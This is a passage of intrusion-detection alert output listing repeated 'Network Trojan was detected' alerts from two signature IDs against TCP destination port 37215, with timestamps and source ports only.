          Timestamp:05/28/24-14:47:56.336650
          SID:2829579
          Source Port:43858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338011
          SID:2835222
          Source Port:38288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877098
          SID:2835222
          Source Port:51840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111256
          SID:2835222
          Source Port:37422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760422
          SID:2835222
          Source Port:56998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913295
          SID:2829579
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973859
          SID:2829579
          Source Port:57112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041284
          SID:2829579
          Source Port:59236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998786
          SID:2829579
          Source Port:33412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161973
          SID:2829579
          Source Port:36768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357195
          SID:2835222
          Source Port:33102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008839
          SID:2829579
          Source Port:45420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266445
          SID:2835222
          Source Port:48176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.501251
          SID:2835222
          Source Port:58700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594718
          SID:2829579
          Source Port:43286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552305
          SID:2829579
          Source Port:53738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594281
          SID:2829579
          Source Port:34180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809948
          SID:2835222
          Source Port:39504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650041
          SID:2829579
          Source Port:48346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554137
          SID:2835222
          Source Port:50944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401260
          SID:2835222
          Source Port:58530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598925
          SID:2829579
          Source Port:54136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271021
          SID:2829579
          Source Port:48426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663429
          SID:2829579
          Source Port:37012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778164
          SID:2829579
          Source Port:39728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296919
          SID:2835222
          Source Port:44124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845276
          SID:2835222
          Source Port:34806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402875
          SID:2829579
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808243
          SID:2829579
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136798
          SID:2835222
          Source Port:54796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176721
          SID:2829579
          Source Port:56292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914688
          SID:2835222
          Source Port:45078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.610966
          SID:2829579
          Source Port:50944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046973
          SID:2829579
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976647
          SID:2829579
          Source Port:55292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594873
          SID:2829579
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230268
          SID:2829579
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939248
          SID:2829579
          Source Port:53462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015872
          SID:2835222
          Source Port:59186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839699
          SID:2829579
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.928922
          SID:2835222
          Source Port:45462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.132910
          SID:2835222
          Source Port:34646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235755
          SID:2835222
          Source Port:45658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336841
          SID:2835222
          Source Port:50114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268786
          SID:2829579
          Source Port:37320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267404
          SID:2835222
          Source Port:51062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547734
          SID:2835222
          Source Port:41208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839505
          SID:2835222
          Source Port:46130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550560
          SID:2829579
          Source Port:47566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842322
          SID:2835222
          Source Port:51794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977395
          SID:2829579
          Source Port:36608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.696902
          SID:2835222
          Source Port:38604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939558
          SID:2829579
          Source Port:40430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.417699
          SID:2835222
          Source Port:54042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622210
          SID:2829579
          Source Port:60964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551188
          SID:2829579
          Source Port:44382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819074
          SID:2829579
          Source Port:44626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215643
          SID:2835222
          Source Port:58150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722338
          SID:2835222
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724498
          SID:2835222
          Source Port:33328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931593
          SID:2829579
          Source Port:58690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.374579
          SID:2835222
          Source Port:43824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472312
          SID:2835222
          Source Port:58264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961574
          SID:2829579
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175990
          SID:2829579
          Source Port:51366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813583
          SID:2829579
          Source Port:47304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371494
          SID:2835222
          Source Port:59654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607575
          SID:2835222
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220654
          SID:2835222
          Source Port:37620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225799
          SID:2829579
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475937
          SID:2835222
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276389
          SID:2835222
          Source Port:47820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144043
          SID:2829579
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.624914
          SID:2835222
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527824
          SID:2829579
          Source Port:46552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272690
          SID:2829579
          Source Port:34274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269878
          SID:2829579
          Source Port:58276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.738507
          SID:2835222
          Source Port:54026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.782817
          SID:2829579
          Source Port:59878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357084
          SID:2829579
          Source Port:53994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124506
          SID:2829579
          Source Port:40848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913673
          SID:2829579
          Source Port:36746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041891
          SID:2829579
          Source Port:49798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.246981
          SID:2835222
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.091585
          SID:2835222
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130658
          SID:2835222
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.076205
          SID:2835222
          Source Port:52312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213714
          SID:2835222
          Source Port:41956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322849
          SID:2835222
          Source Port:59936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609598
          SID:2835222
          Source Port:55632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846968
          SID:2829579
          Source Port:40786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299219
          SID:2829579
          Source Port:41366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497449
          SID:2835222
          Source Port:60072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797657
          SID:2835222
          Source Port:53446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668490
          SID:2835222
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684410
          SID:2829579
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652451
          SID:2829579
          Source Port:56084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.910335
          SID:2835222
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102773
          SID:2829579
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870926
          SID:2835222
          Source Port:57590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161193
          SID:2829579
          Source Port:50148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781357
          SID:2829579
          Source Port:38884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668533
          SID:2829579
          Source Port:47922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974032
          SID:2835222
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210417
          SID:2829579
          Source Port:39898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178951
          SID:2835222
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269799
          SID:2829579
          Source Port:55078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.615392
          SID:2829579
          Source Port:57526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.629114
          SID:2835222
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299462
          SID:2829579
          Source Port:36254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466146
          SID:2835222
          Source Port:55722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938299
          SID:2829579
          Source Port:42436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010464
          SID:2835222
          Source Port:41356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305695
          SID:2835222
          Source Port:47444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551064
          SID:2835222
          Source Port:37852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594289
          SID:2829579
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685508
          SID:2829579
          Source Port:55946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241191
          SID:2835222
          Source Port:56522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266702
          SID:2835222
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.229363
          SID:2835222
          Source Port:40412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542052
          SID:2835222
          Source Port:55334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803850
          SID:2835222
          Source Port:44806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144952
          SID:2835222
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065554
          SID:2835222
          Source Port:51464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.681100
          SID:2835222
          Source Port:37110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704008
          SID:2835222
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269191
          SID:2829579
          Source Port:38802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593259
          SID:2829579
          Source Port:49400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160396
          SID:2829579
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216385
          SID:2829579
          Source Port:51276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975019
          SID:2829579
          Source Port:58894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156320
          SID:2835222
          Source Port:54168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979201
          SID:2829579
          Source Port:38490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843384
          SID:2829579
          Source Port:51768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922335
          SID:2829579
          Source Port:46642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923130
          SID:2829579
          Source Port:49770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156287
          SID:2835222
          Source Port:46438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743684
          SID:2829579
          Source Port:57364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178394
          SID:2835222
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229774
          SID:2829579
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903387
          SID:2835222
          Source Port:57568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325766
          SID:2829579
          Source Port:56234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976231
          SID:2829579
          Source Port:35046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744373
          SID:2829579
          Source Port:59776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209118
          SID:2835222
          Source Port:37812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891022
          SID:2829579
          Source Port:43750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938386
          SID:2829579
          Source Port:41104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592978
          SID:2835222
          Source Port:36270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478273
          SID:2829579
          Source Port:35558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710096
          SID:2835222
          Source Port:51128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064013
          SID:2829579
          Source Port:53164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958695
          SID:2835222
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041385
          SID:2829579
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.146219
          SID:2829579
          Source Port:56104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663256
          SID:2835222
          Source Port:36520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804403
          SID:2829579
          Source Port:45052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557327
          SID:2829579
          Source Port:41108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841461
          SID:2829579
          Source Port:57100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666209
          SID:2829579
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248823
          SID:2835222
          Source Port:54434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215052
          SID:2835222
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156148
          SID:2835222
          Source Port:53522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322337
          SID:2829579
          Source Port:39516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.592107
          SID:2835222
          Source Port:45160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796255
          SID:2835222
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273250
          SID:2835222
          Source Port:56968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019675
          SID:2835222
          Source Port:41508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656159
          SID:2829579
          Source Port:37636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338588
          SID:2835222
          Source Port:42276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850732
          SID:2829579
          Source Port:54178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326583
          SID:2835222
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163757
          SID:2835222
          Source Port:37820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977089
          SID:2829579
          Source Port:56756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195566
          SID:2829579
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325716
          SID:2835222
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048655
          SID:2835222
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2835222
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437392
          SID:2835222
          Source Port:55912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597518
          SID:2835222
          Source Port:46878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178888
          SID:2835222
          Source Port:38036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138063
          SID:2835222
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843054
          SID:2829579
          Source Port:55382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547662
          SID:2835222
          Source Port:33344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609737
          SID:2829579
          Source Port:45428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.925684
          SID:2835222
          Source Port:48230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041967
          SID:2835222
          Source Port:44218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941717
          SID:2829579
          Source Port:37874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298040
          SID:2829579
          Source Port:42478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838662
          SID:2829579
          Source Port:42082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270397
          SID:2835222
          Source Port:55478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964397
          SID:2829579
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356209
          SID:2835222
          Source Port:45304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487796
          SID:2829579
          Source Port:57060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770867
          SID:2829579
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.094226
          SID:2829579
          Source Port:44216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848521
          SID:2829579
          Source Port:60286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.909241
          SID:2829579
          Source Port:36672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.615508
